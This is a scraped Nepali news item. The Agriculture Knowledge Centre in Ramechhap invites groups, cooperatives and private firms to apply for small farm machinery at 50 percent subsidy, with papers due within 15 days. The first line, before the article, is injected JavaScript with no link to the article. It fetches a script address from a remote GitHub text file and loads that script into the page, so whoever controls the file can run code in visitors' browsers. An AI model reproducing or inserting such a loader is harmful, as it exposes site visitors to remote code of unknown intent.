;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
मंसिर ०६,
रामेछाप । कृषी ज्ञान केन्द्र रामेछापले ५० प्रतिशत अनुदानमा कृषि यन्त्र उपकरण सम्झौता गर्न आउन आह्वन गरेको छ ।
शनिबार एक सूचना मार्फत केन्द्रले आर्थिक वर्ष २०७७/०७८ को वार्षिक कार्यक्रममा समूह/सहकारी/निजी क्षेत्रको ५० प्रतिशतमा साझेदारीमा साना मेशिनरी औजार वितरण गर्ने कार्यक्रम अन्तर्गत केन्द्रको सम्पर्कमा आउन आह्वन गरेको हो ।
जसको लागि सूचना प्रकाशन भएको १५ दिन भित्रमा आवश्क कागजात सहित उपस्थित हुनु पर्ने सूचनामा उल्लेख छ ।
फेसबुक प्रतिक्रियाहरु